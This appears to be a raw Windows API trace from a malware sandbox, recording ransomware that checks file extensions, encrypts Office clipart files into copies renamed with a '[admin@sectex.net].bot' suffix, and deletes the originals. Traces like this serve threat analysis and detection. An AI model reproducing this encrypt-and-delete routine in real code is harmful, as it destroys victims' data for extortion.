	[0155.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.874] lstrlenW (lpString=".dbf") returned 4
	[0155.874] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.874] lstrlenW (lpString=".1cd") returned 4
	[0155.874] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.874] lstrlenW (lpString=".jpg") returned 4
	[0155.874] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.874] lstrlenW (lpString=".doc") returned 4
	[0155.874] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.874] lstrlenW (lpString=".docx") returned 5
	[0155.874] lstrcmpiW (lpString1=".docx", lpString2="7.BMP") returned -1
	[0155.874] lstrlenW (lpString=".pdf") returned 4
	[0155.874] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.874] lstrlenW (lpString=".xls") returned 4
	[0155.874] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.874] lstrlenW (lpString=".xlsx") returned 5
	[0155.874] lstrcmpiW (lpString1=".xlsx", lpString2="7.BMP") returned -1
	[0155.874] lstrlenW (lpString=".ppt") returned 4
	[0155.874] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.874] lstrlenW (lpString=".zip") returned 4
	[0155.874] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.875] lstrlenW (lpString=".rar") returned 4
	[0155.875] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.875] lstrlenW (lpString=".bz2") returned 4
	[0155.875] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.875] lstrlenW (lpString=".7z") returned 3
	[0155.875] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0155.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.875] lstrlenW (lpString=".dbf") returned 4
	[0155.875] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.875] lstrlenW (lpString=".1cd") returned 4
	[0155.875] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.875] lstrlenW (lpString=".jpg") returned 4
	[0155.875] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.875] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0155.875] lstrlenW (lpString="J0103058.WMF") returned 12
	[0155.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103058.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0155.876] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=17344) returned 1
	[0155.876] CloseHandle (hObject=0x3d4) returned 1
	[0155.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103058.wmf")) returned 0x20
	[0155.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103058.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103058.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0155.876] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.876] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103058.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0155.877] GetLastError () returned 0x0
	[0155.877] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x43c0, lpOverlapped=0x0) returned 1
	[0155.901] WriteFile (in: hFile=0x388, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x43d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x43d0, lpOverlapped=0x0) returned 1
	[0155.902] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.902] WriteFile (in: hFile=0x388, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.902] SetEndOfFile (hFile=0x388) returned 1
	[0155.902] CloseHandle (hObject=0x388) returned 1
	[0155.902] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.902] SetEndOfFile (hFile=0x3d4) returned 1
	[0155.904] CloseHandle (hObject=0x3d4) returned 1
	[0155.904] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.931] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103058.wmf")) returned 1
	[0155.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.954] lstrlenW (lpString=".doc") returned 4
	[0155.954] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.954] lstrlenW (lpString=".docx") returned 5
	[0155.954] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0155.954] lstrlenW (lpString=".pdf") returned 4
	[0155.954] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.954] lstrlenW (lpString=".xls") returned 4
	[0155.954] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.954] lstrlenW (lpString=".xlsx") returned 5
	[0155.954] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0155.954] lstrlenW (lpString=".ppt") returned 4
	[0155.954] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.954] lstrlenW (lpString=".zip") returned 4
	[0155.954] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.954] lstrlenW (lpString=".rar") returned 4
	[0155.954] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.954] lstrlenW (lpString=".bz2") returned 4
	[0155.954] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.954] lstrlenW (lpString=".7z") returned 3
	[0155.954] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.954] lstrlenW (lpString=".dbf") returned 4
	[0155.955] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.955] lstrlenW (lpString=".1cd") returned 4
	[0155.955] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.955] lstrlenW (lpString=".jpg") returned 4
	[0155.955] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.955] lstrlenW (lpString=".doc") returned 4
	[0155.955] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.955] lstrlenW (lpString=".docx") returned 5
	[0155.955] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0155.955] lstrlenW (lpString=".pdf") returned 4
	[0155.955] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.955] lstrlenW (lpString=".xls") returned 4
	[0155.955] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.955] lstrlenW (lpString=".xlsx") returned 5
	[0155.955] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0155.955] lstrlenW (lpString=".ppt") returned 4
	[0155.955] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.955] lstrlenW (lpString=".zip") returned 4
	[0155.955] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.955] lstrlenW (lpString=".rar") returned 4
	[0155.955] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.955] lstrlenW (lpString=".bz2") returned 4
	[0155.955] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.955] lstrlenW (lpString=".7z") returned 3
	[0155.955] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.956] lstrlenW (lpString=".dbf") returned 4
	[0155.956] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.956] lstrlenW (lpString=".1cd") returned 4
	[0155.956] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned 63
	[0155.956] lstrlenW (lpString=".jpg") returned 4
	[0155.956] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.956] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0155.956] lstrlenW (lpString="J0103850.WMF") returned 12
	[0155.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0155.957] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=23596) returned 1
	[0155.957] CloseHandle (hObject=0x3dc) returned 1
	[0155.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf")) returned 0x20
	[0155.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0155.957] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.957] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0155.958] GetLastError () returned 0x0
	[0155.958] ReadFile (in: hFile=0x3dc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x5c2c, lpOverlapped=0x0) returned 1
	[0156.047] WriteFile (in: hFile=0x3c0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x5c30, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x5c30, lpOverlapped=0x0) returned 1
	[0156.048] ReadFile (in: hFile=0x3dc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.048] WriteFile (in: hFile=0x3c0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.048] SetEndOfFile (hFile=0x3c0) returned 1
	[0156.048] CloseHandle (hObject=0x3c0) returned 1
	[0156.048] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.048] SetEndOfFile (hFile=0x3dc) returned 1
	[0156.051] CloseHandle (hObject=0x3dc) returned 1
	[0156.051] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.200] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf")) returned 1
	[0156.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.307] lstrlenW (lpString=".doc") returned 4
	[0156.308] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.308] lstrlenW (lpString=".docx") returned 5
	[0156.308] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0156.308] lstrlenW (lpString=".pdf") returned 4
	[0156.308] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.308] lstrlenW (lpString=".xls") returned 4
	[0156.308] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.308] lstrlenW (lpString=".xlsx") returned 5
	[0156.308] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0156.308] lstrlenW (lpString=".ppt") returned 4
	[0156.308] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.308] lstrlenW (lpString=".zip") returned 4
	[0156.308] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.308] lstrlenW (lpString=".rar") returned 4
	[0156.308] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.308] lstrlenW (lpString=".bz2") returned 4
	[0156.308] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.308] lstrlenW (lpString=".7z") returned 3
	[0156.308] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.308] lstrlenW (lpString=".dbf") returned 4
	[0156.308] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.308] lstrlenW (lpString=".1cd") returned 4
	[0156.308] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.308] lstrlenW (lpString=".jpg") returned 4
	[0156.308] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.309] lstrlenW (lpString=".doc") returned 4
	[0156.309] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.309] lstrlenW (lpString=".docx") returned 5
	[0156.309] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0156.309] lstrlenW (lpString=".pdf") returned 4
	[0156.309] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.309] lstrlenW (lpString=".xls") returned 4
	[0156.309] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.309] lstrlenW (lpString=".xlsx") returned 5
	[0156.309] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0156.309] lstrlenW (lpString=".ppt") returned 4
	[0156.309] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.309] lstrlenW (lpString=".zip") returned 4
	[0156.309] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.309] lstrlenW (lpString=".rar") returned 4
	[0156.309] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.309] lstrlenW (lpString=".bz2") returned 4
	[0156.309] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.309] lstrlenW (lpString=".7z") returned 3
	[0156.309] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.309] lstrlenW (lpString=".dbf") returned 4
	[0156.309] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.309] lstrlenW (lpString=".1cd") returned 4
	[0156.309] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63
	[0156.309] lstrlenW (lpString=".jpg") returned 4
	[0156.309] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.310] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.310] lstrlenW (lpString="J0105234.WMF") returned 12
	[0156.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105234.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.323] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=3444) returned 1
	[0156.323] CloseHandle (hObject=0x38c) returned 1
	[0156.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105234.wmf")) returned 0x20
	[0156.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105234.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105234.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.324] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.324] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105234.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0156.324] GetLastError () returned 0x0
	[0156.324] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xd74, lpOverlapped=0x0) returned 1
	[0156.343] WriteFile (in: hFile=0x3bc, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xd80, lpOverlapped=0x0) returned 1
	[0156.344] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.344] WriteFile (in: hFile=0x3bc, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.344] SetEndOfFile (hFile=0x3bc) returned 1
	[0156.344] CloseHandle (hObject=0x3bc) returned 1
	[0156.344] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.344] SetEndOfFile (hFile=0x38c) returned 1
	[0156.346] CloseHandle (hObject=0x38c) returned 1
	[0156.347] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.347] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105234.wmf")) returned 1
	[0156.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.347] lstrlenW (lpString=".doc") returned 4
	[0156.347] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.347] lstrlenW (lpString=".docx") returned 5
	[0156.348] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0156.348] lstrlenW (lpString=".pdf") returned 4
	[0156.348] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.348] lstrlenW (lpString=".xls") returned 4
	[0156.348] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.348] lstrlenW (lpString=".xlsx") returned 5
	[0156.348] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0156.348] lstrlenW (lpString=".ppt") returned 4
	[0156.348] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.348] lstrlenW (lpString=".zip") returned 4
	[0156.348] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.348] lstrlenW (lpString=".rar") returned 4
	[0156.348] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.348] lstrlenW (lpString=".bz2") returned 4
	[0156.348] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.348] lstrlenW (lpString=".7z") returned 3
	[0156.348] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.348] lstrlenW (lpString=".dbf") returned 4
	[0156.348] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.348] lstrlenW (lpString=".1cd") returned 4
	[0156.348] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
